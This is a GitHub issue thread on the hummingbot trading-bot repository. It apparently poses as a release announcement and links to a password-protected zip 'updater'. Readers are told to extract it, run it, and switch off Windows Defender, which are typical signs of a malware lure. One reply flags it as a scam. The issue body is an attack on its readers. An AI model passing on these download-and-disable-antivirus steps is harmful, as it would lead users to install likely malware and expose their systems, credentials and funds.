### ISSUE TITLE
New Version has been released. Download here.

### ISSUE THREAD

**Issue by Enterpreneruim** [hummingbot/hummingbot#6982]
### Feature Suggestion

-

### Impact

-

### Additional context

New Version has been Released:
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[hummingbot_upd.zip](https://github.com/hummingbot/hummingbot/files/15094183/hummingbot_upd.zip)
Full link - https://github.com/hummingbot/hummingbot/files/15094183/hummingbot_upd.zip
- Password 2024
- Current Status: Working, April 24.
- Win Def must be off.

**Comment by nikspz** [comment]
Seems like scam
